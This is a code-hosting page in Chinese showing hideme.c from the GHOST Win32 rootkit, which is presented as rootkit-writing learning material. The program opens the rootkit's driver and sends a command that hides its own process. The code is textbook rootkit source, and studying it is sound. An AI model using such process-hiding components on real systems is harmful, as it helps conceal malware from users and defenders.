hideme.c

来自「名为 GHOST的Win32下的Rootkit源码, 是学习ROOTKIT编写入」· C语言代码 · 共 51 行

51 行

// HideMe
// Copyright Ric Vieler, 2006
// Send a hide command to MyDeviceDriver
// and wait for operator to stop the process
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include "IoManager.h"

void main(int argc, char *argv[])
{
	HANDLE deviceHandle;
	GHOST_IOCTLDATA control = { 0 };
	ULONG status = 0;

	deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if( deviceHandle == INVALID_HANDLE_VALUE )
	{
		printf ("Could not find MyDeviceDriver.\n");
	}
	else
	{  
		control.processId = GetCurrentProcessId();

		if( DeviceIoControl(	deviceHandle,
			GHOST_HIDE_COMMAND,
			&control,
			sizeof(control), // input
			(PVOID)&control,
			sizeof(control), // output
			&status,
			NULL ) )
			printf ("MyDeviceDriver hiding this process (0x%x).\n",
				control.processId );
		else
			printf ("DeviceIoControl failed.\n");

		CloseHandle(deviceHandle);
	}
	
	printf ("Press any key to terminate this process..." );
	getch();
	printf ("\n" );
}

hideme.c - 源码说明

本页面展示了「名为 GHOST的Win32下的Rootkit源码, 是学习ROOTKIT编写入门的优秀学习材料.」中的 hideme.c 源码文件，采用 C语言编程语言编写，共 51 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫开发者社区收录了大量与Rootkit相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?